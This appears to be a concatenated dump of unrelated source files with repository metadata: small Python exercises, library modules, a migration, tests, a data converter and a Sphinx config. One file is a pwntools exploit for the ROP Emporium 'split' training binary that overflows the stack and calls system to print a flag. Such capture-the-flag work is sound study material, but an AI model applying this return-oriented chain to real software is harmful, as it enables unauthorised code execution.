            if self.stado_state.count(self.state_animal[1]) < 3:
                print('Надо бы вызвать ветеринара!')
            elif self.stado_state.count(self.state_animal[1]) > 2:
                print('СРОЧНО ВЫЗВАТЬ ВЕТЕРИНАРА!')

    def navedem_poryadok(self):
        """Vet visit: cure all sick animals and remove the dead ones."""
        self.quant = self.stado_state.count(self.state_animal[0]) + self.stado_state.count(self.state_animal[1])
        self.stado_state.clear()
        self.stado_state = [self.state_animal[0]] * self.quant
        self.stado_state_vsego = 'live'
        print('Приехал ветеринар, больных - вылечил, мертвых - забрал. '
              'Итого у нас сейчас {} {}'.format(self.quant, self.name))
# Smoke-test herd; the commented calls below exercise the Animals API.
stado = Animals('рогатые', 'коза')
# print(stado.__dict__)
# print(Animal.state_animal)
# stado.add(5)
# stado.change_state()
# stado.feed()
# print(stado.stado_state)
# stado.add(3)
# stado.feed()
# stado.kill(2)
# stado.change_state(False)
# stado.change_state(1, 2)
# stado.navedem_poryadok()
class Goats(Animals):
    """A goat herd that produces milk.

    kolvo_product       -- litres produced per healthy animal per feeding
    vsego_kolvo_product -- litres produced since the last milking
    nadoi               -- total litres collected and not yet sold
    """
    # Class-level values are defaults only; per-instance counters are set
    # in __init__ (the originals were shared between every Goats herd).
    product = 'milk'
    kolvo_product = 10  # litres per healthy animal
    vsego_kolvo_product = 0
    nadoi = 0

    def __init__(self, type_animal='рогатые', name='коза'):
        super().__init__(type_animal, name)
        self.vsego_kolvo_product = 0
        self.nadoi = 0

    def feed(self, n, m):
        """Walk (start *n* o'clock, *m* hours) and feed; only healthy animals
        produce milk."""
        super().walk(n, m)
        super().feed()
        self.vsego_kolvo_product = self.stado_state.count(self.state_animal[0]) * self.kolvo_product
        print(f'Покромили, погуляли, нагуляли - {self.vsego_kolvo_product}л {self.product}')

    def doika(self):
        """Milk the herd: move the produced litres into the collected total."""
        self.nadoi += self.vsego_kolvo_product
        print(f'Надоили {self.vsego_kolvo_product}л {self.product}. Всего у нас {self.nadoi}л')
        self.vsego_kolvo_product = 0

    def sale(self, price, quant):
        """Sell *quant* litres at *price* per litre, if that much is collected."""
        if quant<=self.nadoi:
            print(f'Продали {quant}л. {self.product}. Получили за него {price*quant}руб.')
            self.nadoi -= quant
        else: print(f'{quant}л. молока мы еще не собрали. У нас всего {self.nadoi}')
# Demo run of the Goats herd (the commented block shows a 'dead herd' test).
# print('----------------------')
# g_dead = Goats()
# g_dead.stado_state_vsego = 'dead' # herd of dead goats
# print(g_dead.name, g_dead.stado_state, 'Состояние стада -', g_dead.stado_state_vsego)
# print(Goats.mro())
g = Goats()  # herd of healthy goats
g.add(7)
g.kill(2)
g.change_state(True, 2)
print('Состяние всего стада - ', g.stado_state_vsego)
g.change_state(False)
print('----------------------')
g.feed(3, 4)
g.doika()
g.navedem_poryadok()
print('Состяние всего стада - ', g.stado_state_vsego)
g.feed(5, 6)
g.doika()
g.sale(45,1000)
print('----------------------')
g.add(1)
g.feed(7, 10)
"reklama.analitika@gmail.com"
] | reklama.analitika@gmail.com |
d7347ded155d726c1280eaa8b4a1b75779976483 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_169/ch167_2020_06_19_15_17_32_858494.py | a7645291dc1cbd46804f0758f0845bbdbddb6e65 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | def bairro_mais_custoso(dicionario):
dicionario2={}
lista=[]
dicionario3={}
for i in dicionario:
dicionario2[i]=0
for e in dicionario[i][6:]:
dicionario2[i]+=e
for k in dicionario2:
lista.append(dicionario2[k])
dicionario3[dicionario2[k]]=k
for e in lista:
if e == dicionario3[dicionario2[k]]:
return k
return k
| [
"you@example.com"
] | you@example.com |
a1b37413fcb03dc1ce9f772b5367868d009ee3b6 | 366c165fb54448079cf988651c92b7beab0aa36f | /Python basics/4. Полезные инструменты/hw_4_4.py | 3db80ef1d33084e5b9b36a4ad50fd60fcafde5fc | [] | no_license | Dukemegaman/python_repo | b40faaf59a293ef2afd728a44f6a1264cb39ee87 | 711ee7aee4d8ead1f30f6453a026a92ada7ec296 | refs/heads/main | 2023-07-02T06:47:05.839371 | 2021-08-11T21:19:40 | 2021-08-11T21:19:40 | 341,982,448 | 0 | 0 | null | 2021-07-02T17:30:49 | 2021-02-24T17:38:09 | Python | UTF-8 | Python | false | false | 787 | py | """
4. Представлен список чисел. Определить элементы списка, не имеющие повторений.
Сформировать итоговый массив чисел, соответствующих требованию.
Элементы вывести в порядке их следования в исходном списке.
Для выполнения задания обязательно использовать генератор.
"""
original_list = [1, 2, 3, 4, 4, 3, 5, 1, 3, 6, 1, 2, 7]
new_list = [i for i in original_list if original_list.count(i) == 1]
print("Исходные элементы списка: ", original_list)
print("Элементы списка, не имеющие повторений: ", new_list)
| [
"Dukemegaman@gmail.com"
] | Dukemegaman@gmail.com |
1ac8667987147799e4335c9a3bf5457253525894 | c8d9f656050c3ac2c601b3b0c50c448ddb176bed | /torecsys/layers/ctr/positon_bias_aware_learning_framework.py | 7a32cb411127eb1edbf675dc50a1d0714e3f247e | [
"MIT"
] | permissive | hevensun/torecsys | 207d618a5aba84d5e50d47625685037163aa22f5 | f0432e2d7652eed0fe643c1b2ef8bdf6bc1efed8 | refs/heads/master | 2022-04-11T14:04:19.829625 | 2020-03-13T08:34:20 | 2020-03-13T08:34:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,564 | py | import torch
import torch.nn as nn
from torecsys.utils.decorator import jit_experimental, no_jit_experimental_by_namedtensor
from typing import Tuple
class PositionBiasAwareLearningFrameworkLayer(nn.Module):
    """Adds a learned, position-dependent bias to a session embedding."""

    def __init__(self, input_size: int, max_num_position: int):
        super().__init__()
        # One learnable bias vector of length `input_size` per position index.
        self.position_bias = nn.Embedding(max_num_position, input_size)

    def forward(self, position_embed_tensor: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        r"""Forward calculation of PositionBiasAwareLearningFrameworkLayer.

        Args:
            position_embed_tensor ((T, T)), shape = ((B, E), (B, )),
                dtype = (torch.float, torch.long): pair of the embedded
                session tensor and each session's position in the sequence.

        Returns:
            T, shape = (B, E), dtype = torch.float: session embedding shifted
            by the bias looked up for its position.
        """
        session_embed, positions = position_embed_tensor
        # Look up the per-position bias, shape (B, E), and shift the input.
        bias = self.position_bias(positions)
        return session_embed + bias
| [
"p768lwy3@gmail.com"
] | p768lwy3@gmail.com |
f9ba3ed7a52583d3bf7e011dfe1d3da05108a16b | 633dd304b2ef5e55d4f62270e290877d26ac8ee8 | /stevedore/enabled.py | 87c4aa23146ac17d6c394dfc001baf3eed1b9555 | [
"Apache-2.0"
] | permissive | inteq/stevedore | aa906d8cd381fc4859f693985167bd910fd0128c | 90314340fdfaab25b29c077f8ed72c9c42900269 | refs/heads/master | 2020-12-30T17:20:24.580062 | 2012-09-15T20:25:22 | 2012-09-15T20:25:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,987 | py | import logging
from .extension import ExtensionManager
LOG = logging.getLogger(__name__)
class EnabledExtensionManager(ExtensionManager):
    """Loads only plugins that pass a check function.

    The check_func should return a boolean, with ``True`` indicating
    that the extension should be loaded and made available and
    ``False`` indicating that the extension should be ignored.

    :param namespace: The namespace for the entry points.
    :type namespace: str
    :param check_func: Function to determine which extensions to load.
    :type check_func: callable
    :param invoke_on_load: Boolean controlling whether to invoke the
        object returned by the entry point after the driver is loaded.
    :type invoke_on_load: bool
    :param invoke_args: Positional arguments to pass when invoking
        the object returned by the entry point. Only used if invoke_on_load
        is True.
    :type invoke_args: tuple
    :param invoke_kwds: Named arguments to pass when invoking
        the object returned by the entry point. Only used if invoke_on_load
        is True. Defaults to an empty dict.
    :type invoke_kwds: dict
    """

    def __init__(self, namespace, check_func, invoke_on_load=False,
                 invoke_args=(), invoke_kwds=None):
        self.check_func = check_func
        # Fixed: the default used to be a mutable ``{}`` shared by every call,
        # so mutations made downstream would leak between instances.  Use a
        # None sentinel and substitute a fresh dict per instance instead.
        super(EnabledExtensionManager, self).__init__(
            namespace,
            invoke_on_load=invoke_on_load,
            invoke_args=invoke_args,
            invoke_kwds={} if invoke_kwds is None else invoke_kwds,
        )

    def _load_one_plugin(self, ep, invoke_on_load, invoke_args, invoke_kwds):
        """Load one entry point, or return None when check_func rejects it."""
        if not self.check_func(ep):
            LOG.debug('ignoring extension %r', ep.name)
            return None
        return super(EnabledExtensionManager, self)._load_one_plugin(
            ep, invoke_on_load, invoke_args, invoke_kwds,
        )
| [
"doug.hellmann@dreamhost.com"
] | doug.hellmann@dreamhost.com |
e8436b928f4837ea8ff9966ee40445f15fd7e0f7 | ad66f8dd4e1ab194b83bff73c6eb45cf662a6473 | /api/views.py | 69bf2986cc3a00dfa780f6e851043b5a197c7c7c | [] | no_license | unnatic312/libray-book | af96ff1c479bc91b87b7c69b22f30cf344f97af3 | fc149a52a9c167562f51369aff856aea4e9df766 | refs/heads/master | 2022-12-23T01:27:12.839677 | 2018-04-19T09:54:35 | 2018-04-19T09:54:35 | 118,901,335 | 0 | 1 | null | 2022-12-16T02:31:42 | 2018-01-25T10:53:55 | Python | UTF-8 | Python | false | false | 717 | py | from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.viewsets import ModelViewSet
from .serializers import BookSerializer, BookReviewSerializer
from library.models import Books, BookReview
class BookSerializerViewSet(ModelViewSet):
    """Token-authenticated CRUD API endpoints for Books."""
    serializer_class = BookSerializer
    queryset = Books.objects.all()
    authentication_classes = (TokenAuthentication,)
    permission_classes = (IsAuthenticated,)
class BookReviewSerialzerViewSet(ModelViewSet):
    """Token-authenticated CRUD API endpoints for BookReview objects."""
    # NOTE(review): the class name has a typo ("Serialzer"); renaming it would
    # break any URLConf/router referring to it, so it is only flagged here.
    serializer_class = BookReviewSerializer
    queryset = BookReview.objects.all()
    authentication_classes = (TokenAuthentication,)
    permission_classes = (IsAuthenticated,) | [
"hardik@kuwaitnet.com"
] | hardik@kuwaitnet.com |
5b04d15420f559f7c75a1cf772a31cb8aa898403 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2566/60627/239561.py | e69aa50e41e94e98b56e97cd11efa5bf495bf257 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 441 | py | # 20
# Read an n-row matrix from stdin: the first line is n, each following line a
# comma-separated row (e.g. "1,2,3").  The rows are stitched into the text of
# a Python list-of-lists literal and parsed with ast.literal_eval.
n = int(input())
s = '['
for i in range(n):
    inp = input()
    s += ('[' + inp + '],')
s = s[:-1] + ']'  # drop the trailing comma and close the outer list
from ast import literal_eval
num = literal_eval(s)
l = []  # collects the total cost of every path explored by f() below
def f(num, i, j, t):
    """Depth-first enumeration of every monotone (down/right) path through
    the square grid `num`, starting at cell (i, j) with accumulated cost `t`.
    Each complete path's total is appended to the module-level list `l`."""
    global l
    size = len(num)
    running = t + num[i][j]
    # Bottom-right corner reached: record this path's total cost.
    if i == size - 1 and j == size - 1:
        l.append(running)
        return
    if 0 <= i + 1 < size:
        f(num, i + 1, j, running)
    if 0 <= j + 1 < size:
        f(num, i, j + 1, running)
f(num,0,0,0)
print(min(l)) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
c1da5d4f2e2d43b82c977f498ea155098ae2e99d | c77a40408bc40dc88c466c99ab0f3522e6897b6a | /Programming_basics/Exercise_1/VacationBooksList.py | 3ce9b5265267af70f22eb065be20cff43206264f | [] | no_license | vbukovska/SoftUni | 3fe566d8e9959d390a61a4845381831929f7d6a3 | 9efd0101ae496290313a7d3b9773fd5111c5c9df | refs/heads/main | 2023-03-09T17:47:20.642393 | 2020-12-12T22:14:27 | 2021-02-16T22:14:37 | 328,805,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | book_pages = int(input())
reading_speed = int(input())  # pages read per hour
time_limit = int(input())  # days available for the vacation read
# total hours needed for the whole book, then spread evenly over the days
tot_hours = book_pages / reading_speed
per_day = tot_hours / time_limit
print(per_day)
| [
"vbukovska@yahoo.com"
] | vbukovska@yahoo.com |
1189ee43148ae71e4e63174d6f48d775698a66d8 | 235c4b3aa630737b379050a420923efadd432da8 | /1stRound/Easy/599 Minimum Index Sum of Two Lists/Heap.py | 509359ed759a98a80c7b55d98f9e9ee6e90ae456 | [
"MIT"
] | permissive | ericchen12377/Leetcode-Algorithm-Python | 4e5dc20062280ef46194da5480600b2459fd89f8 | eb58cd4f01d9b8006b7d1a725fc48910aad7f192 | refs/heads/master | 2023-02-22T22:43:55.612650 | 2021-01-28T04:00:20 | 2021-01-28T04:00:20 | 258,058,468 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 971 | py | import heapq
class Solution:
    def findRestaurant(self, list1, list2):
        """
        :type list1: List[str]
        :type list2: List[str]
        :rtype: List[str]
        """
        # Index of each restaurant in list2; restaurants missing from list2
        # get the sentinel 100000, matching the original placeholder.
        positions2 = {name: j for j, name in enumerate(list2)}
        index_sums = {}
        for i, name in enumerate(list1):
            index_sums[name] = i + positions2.get(name, 100000)
        if not index_sums:
            return []
        best = min(index_sums.values())
        # Ties are returned in lexicographic order — the same order a
        # (sum, name) min-heap would pop equal-sum entries.
        return sorted(name for name, total in index_sums.items() if total == best)
list1 = ["Shogun", "Tapioca Express", "Burger King", "KFC"]
list2 = ["Piatti", "The Grill at Torrey Pines", "Hungry Hunter Steakhouse", "Shogun"]
p = Solution()
print(p.findRestaurant(list1,list2)) | [
"suiyaochen@mail.usf.edu"
] | suiyaochen@mail.usf.edu |
a9abec22d02ceaadd3c8d5c413c4e65dc1eca38d | 2056251e266b2fd57b6568e0d2effeda75229297 | /bin/instagram-py | ff3f237642242dfdcac2b729d316a00901f95880 | [
"MIT"
] | permissive | VineshChauhan24/instagram-py | 36bf477636d519207ced5d8c5f492a6513f5ea96 | 9ea84ad4019cfdfd0dc1cdc1fd5fbc7a6d9c624c | refs/heads/master | 2020-04-29T21:54:11.402814 | 2017-10-19T03:52:39 | 2017-10-19T03:52:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,049 | #!/usr/bin/env python3
#*********************************************************************************#
# MIT License #
# #
# Copyright (c) 2017 The Future Shell , DeathSec. #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy #
# of this software and associated documentation files (the "Software"), to deal #
# in the Software without restriction, including without limitation the rights #
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #
# copies of the Software, and to permit persons to whom the Software is #
# furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all #
# copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #
# SOFTWARE. #
#*********************************************************************************#
import InstagramPy
if __name__ == '__main__':
    # Script entry point: delegate to the package's CLI dispatcher.
    InstagramPy.ExecuteInstagramPy()
| [
"antonyjr@protonmail.com"
] | antonyjr@protonmail.com | |
c73a6cf82b5ab0f451cbea03c6b1ea0eacf57c58 | edde97226d4040bef816466f9727c0a16acdc128 | /alembic/versions/d7b70034dca4_rename_client_id_column_name.py | dc3830df1c19fae9959f6e5ac81574b430465a42 | [] | no_license | LuisAcerv/python-microservice | 0f0656393c0b0609dfe3d7f8186ae836e773400e | f2d4315769dec8d0de1219de38c18fbc34314731 | refs/heads/master | 2022-10-09T07:45:06.901368 | 2019-09-15T19:20:06 | 2019-09-15T19:20:06 | 206,206,529 | 0 | 0 | null | 2022-09-16T18:08:44 | 2019-09-04T01:44:43 | Python | UTF-8 | Python | false | false | 529 | py | """Rename client_id column name
Revision ID: d7b70034dca4
Revises: c7fe165faa42
Create Date: 2019-09-05 00:04:03.842950
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd7b70034dca4'
down_revision = 'c7fe165faa42'
branch_labels = None
depends_on = None
def upgrade():
    # Rename projects.client_id -> projects.project_id (and make it nullable).
    op.alter_column('projects', 'client_id', nullable=True, new_column_name='project_id')
def downgrade():
    # Reverse of upgrade(): after upgrade() ran, the column is named
    # 'project_id', so the downgrade must rename 'project_id' back to
    # 'client_id'.  (The original passed 'client_id' as the existing column
    # name, which no longer exists at this point, so downgrading would fail.)
    op.alter_column('projects', 'project_id', nullable=False, new_column_name='client_id')
| [
"l.arr.cerv@gmail.com"
] | l.arr.cerv@gmail.com |
0f0013ebec301b7d33f8b768e739afda48109e2f | 1acafcd4dd645ce460e4252152eec3375085bed4 | /Env/exhx5_gazebo/setup.py | 931e14a4e0f0f038e7a1ecfd2e202ad1b716d393 | [] | no_license | wuzy57/shixun | 4c192e0e8b1832cf7ad59153785fefc693bc1224 | 92bc2f14b19a16f06654f234a7c57c18863339ab | refs/heads/master | 2023-01-03T09:28:35.584919 | 2020-10-25T08:17:23 | 2020-10-25T08:17:23 | 306,874,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | #!/usr/bin/env python
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
# Build the distutils setup() arguments from this ROS package's package.xml.
d = generate_distutils_setup()
d['packages'] = ['exhx5_gazebo']
d['package_dir'] = {'': 'src'}  # Python sources live under src/
setup(**d)
| [
"1120902512@qq.com"
] | 1120902512@qq.com |
6d36d7e25b88308e58d0b8062d820079f9529fc8 | 8f8ac99fd3ed9ceb36778b404f6fdd0b6899d3f4 | /pyobjc-framework-Metal/PyObjCTest/test_mtlaccelerationstructuretypes.py | c3bd2771327be119bf00faa1fd5e34797066345f | [
"MIT"
] | permissive | strogo/pyobjc | ac4201c7742eb75348328eeecb7eedf4e3458de3 | 2579c5eaf44b0c5af77ee195c417d2c65e72dfda | refs/heads/master | 2023-07-13T00:41:56.448005 | 2021-08-24T06:42:53 | 2021-08-24T06:42:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,162 | py | import Metal
from PyObjCTools.TestSupport import TestCase
class TestMTLAccelerationStructureTypes(TestCase):
    """Checks how the MTLAccelerationStructure C types are exposed by the
    Metal bridge (currently: asserts they are *not* bridged)."""
    def test_structs(self):
        """The packed struct types are not available on the Metal module."""
        self.assertNotHasAttr(Metal, "MTLPackedFloat3")
        self.assertNotHasAttr(Metal, "MTLPackedFloat4x3")
        self.assertNotHasAttr(Metal, "MTLAccelerationStructureInstanceDescriptor")
        # The checks below are kept for when the types get bridged:
        # v = Metal.MTLPackedFloat3()
        # self.assertIsInstance(v.x, float)
        # self.assertIsInstance(v.y, float)
        # self.assertIsInstance(v.z, float)
        # self.asssertNotHasattr(v, "elements")
        # v = Metal.MTLPackedFloat4x3()
        # self.assertHasattr(v, "columns")
        # v = Metal.MTLAccelerationStructureInstanceDescriptor()
        # self.assertIsInstance(v.transformationMatrix, Metal.MTLPackedFloat4x3)
        # self.assertIsInstance(v.flags, int)
        # self.assertIsInstance(v.mask, int)
        # self.assertIsInstance(v.intersectionFunctionTableOffset, int)
        # self.assertIsInstance(v.accelerationStructureIndex, int)
    def test_functions(self):
        """The helper constructors are likewise not bridged."""
        # MTLPackedFloat3 is not available (See above)
        self.assertNotHasAttr(Metal, "MTLPackedFloat3Make")
"ronaldoussoren@mac.com"
] | ronaldoussoren@mac.com |
04e5c29fd3536e5ffc4f03ada2434ad4101b1362 | e9d7689655887232b652ef369c7eaf3a1ef06955 | /old/ePhy/in vivo multi/convert v3.py | 30b7047a231015b6843c8b5de6d3593611be8041 | [] | no_license | Gilles-D/main | 81ac13cdb1614eb0c82afb3d0e847a30b78cad30 | f3714d2cbe4aae22ab36f4f94c94067159270820 | refs/heads/master | 2023-08-31T06:20:48.554237 | 2023-08-30T20:33:27 | 2023-08-30T20:33:27 | 222,518,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,954 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Mar 28 11:57:30 2019
@author: lspaeth (modified by flareno)
Created on Mon Nov 12 14:14:18 2018
This class loads HdF5 recordings from MCS acquisition system as matrices of shape ((channel,data))
Allows to load Raw signals
+ associated time vectors
+ associated sampling rates
All in Volts and Seconds
Hope it will work
Then all you have to do is to load HdF5IO from the eletroPy package; initialise the class with something = HdF5IO(filepath).
After that you can load every instance with its associated function; they are all described below.
"""
import matplotlib.pyplot as plt
import numpy as np
class HdF5IO:
    """Reader for MCS HdF5 recordings; exposes the raw analog stream."""
    def __init__(self,filepath):
        """Open `filepath` read-only and keep the top-level 'Data' node."""
        import h5py as h5
        file_ = h5.File(filepath,'r')
        self.file = file_['Data'] #Loads first node
    #----------RAW RECORDINGS---------------------------------------------------------------------------------------------
    def raw_record(self): #Gets Raw Records as matrix ((channel,data))
        """Return the raw traces as a (channel, samples) float matrix.

        Values are divided by the per-channel scaling factor stored in
        InfoChannel[0][10] (pV -> V according to the original comments).
        """
        raw = self.file['Recording_0']['AnalogStream']['Stream_0']['ChannelData']
        import numpy as np
        raw_record = np.zeros((raw.shape[0],raw.shape[1]))
        raw_conv = float(self.file['Recording_0']['AnalogStream']['Stream_0']['InfoChannel'][0][10]) #Scaling Factor
        for i in range(raw.shape[0]): #Stores data in new matrix
            raw_record[i,:] = raw[i,:]/raw_conv #From pV to V
        return raw_record
    def raw_time(self): #Gets time vector for raw records
        """Return the time axis (seconds) matching raw_record()'s columns."""
        import numpy as np
        raw_tick = int(self.file['Recording_0']['AnalogStream']['Stream_0']['InfoChannel'][0][9])/1000000.0 #exp6 to pass from us to s
        raw_length = len(self.file['Recording_0']['AnalogStream']['Stream_0']['ChannelData'][0])
        raw_time = np.arange(0,raw_length*raw_tick,raw_tick)
        return raw_time
    def raw_sampling_rate(self): #Gets sampling rate
        """Return the sampling rate in Hz (inverse of the tick in seconds)."""
        raw_tick = float(self.file['Recording_0']['AnalogStream']['Stream_0']['InfoChannel'][0][9])/1000000.0
        return 1.0/raw_tick #In Hz
#---------CONVERT H5 to RAW BINARY-----------------------------------------------------------------------------------
def convert_folder(folderpath, newpath, data_type='raw'):
    """Load every MCS .h5 recording found directly in `folderpath`.

    Args:
        folderpath: directory scanned (non-recursively) for .h5 files.
        newpath: kept for interface compatibility; the removed .rbf export
            used it, the current code does not.
        data_type: unused; kept for backward compatibility.

    Returns:
        list of numpy arrays, one (channel, samples) matrix per .h5 file,
        in os.listdir() order.
    """
    # Fixed: the original left two unreachable statements after the return
    # (plus a commented-out .rbf export); they are removed here along with
    # the unused `re`/`numpy` imports.
    import os

    converted = []
    for file in os.listdir(folderpath):
        if file.endswith('.h5'):
            print ('Converting ' + file + '...')
            data = HdF5IO('%s/%s' % (folderpath, file))
            converted.append(data.raw_record())
            print ('Conversion DONE')
        else:
            print (file + ' is not an h5 file, will not be converted')
    return converted
if __name__ == '__main__':
    # Hard-coded acquisition-session paths for this analysis run.
    folderpath = r'C:/Users/Gilles.DELBECQ/Desktop/In vivo Février 2022/H5/15-02'
    newpath = r'C:\Users\Gilles.DELBECQ\Desktop\In vivo Février 2022\RBF/15-02'
    a = convert_folder(folderpath, newpath)
    # NOTE(review): this first assignment is dead — it is overwritten by the
    # concatenate() call on the next line.
    array_final = np.array([])
    array_final = np.concatenate(a,axis=0)
    # Dump all channels of all files as one flat raw-binary file.
    file_save = 'C:/Users/Gilles.DELBECQ/Desktop/In vivo Février 2022/H5/15-02/concatenated.rbf'
    with open(file_save, mode='wb') as file :
        array_final.tofile(file,sep='')
| [
"gillesdelbecq@hotmail.fr"
] | gillesdelbecq@hotmail.fr |
8fedea243147c50dffee69e5a963ed258abb7d4c | 5582a5883400cff43e1db863503f639eff64ed1d | /split/split.py | 65b0d19c7332b3a49ddcb16fb853275d586b6049 | [] | no_license | arvandy/ROP-Emporium | 581ac7cc9b35a4393caf7a449bd0803a042c5250 | 1df58eb9aa6acaaa10d71e30927ef0fa097815f7 | refs/heads/master | 2020-04-15T21:23:57.265919 | 2019-01-23T11:22:35 | 2019-01-23T11:22:35 | 165,031,651 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py | #!/usr/bin/python
from pwn import *
def main():
    # Python 2 / pwntools exploit for the ROP Emporium "split" binary:
    # overflow the stack buffer, then call system("/bin/cat flag.txt") via a
    # pop-rdi gadget.
    junk = "A" * 40 # RIP Offset at 40
    cat_flag = p64(0x00601060) # Radare2 command: izz
    system_plt = p64(0x4005e0) # objdump -d split | grep system
    pop_rdi = p64(0x0000000000400883) # python ROPgadget.py --binary split | grep rdi
    p = process("./split")
    # Chain: pop rdi ; ret -> rdi = &"/bin/cat flag.txt" -> system@plt
    payload = junk + pop_rdi + cat_flag + system_plt
    p.sendlineafter(">", payload)
    print p.recvall()
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | arvandy.noreply@github.com |
6e4a95d5f3cdbd026d13024deb8a80eb42edccb5 | 95ea95e6a7c3ac387682bd02ba858bd8b617cd23 | /conf.py | 4446d6ae0994a62ded3b375234ce4301d320aef7 | [
"Apache-2.0"
] | permissive | josh-howes/xlearn_doc | e45714bdff4122096cd16c719b2e7b9cadc17767 | eae338f83a87f3cf6a47149dd6dbbe1f00bf2ba0 | refs/heads/master | 2020-03-25T15:42:29.219113 | 2018-04-22T08:12:51 | 2018-04-22T08:12:51 | 143,897,506 | 0 | 0 | Apache-2.0 | 2018-08-07T16:06:01 | 2018-08-07T16:06:01 | null | UTF-8 | Python | false | false | 5,101 | py | # -*- coding: utf-8 -*-
#
# xlearn_doc documentation build configuration file, created by
# sphinx-quickstart on Sun Dec 3 18:43:51 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'xLearn'
copyright = u'2017, Chao Ma'
author = u'Chao Ma'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.2.0'
# The full version, including alpha/beta/rc tags.
release = u'0.2.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
'**': [
'relations.html', # needs 'show_related': True theme option to display
'searchbox.html',
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'xlearn_docdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'xlearn_doc.tex', u'xlearn\\_doc Documentation',
u'Chao Ma', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'xlearn_doc', u'xlearn_doc Documentation',
[author], 1)
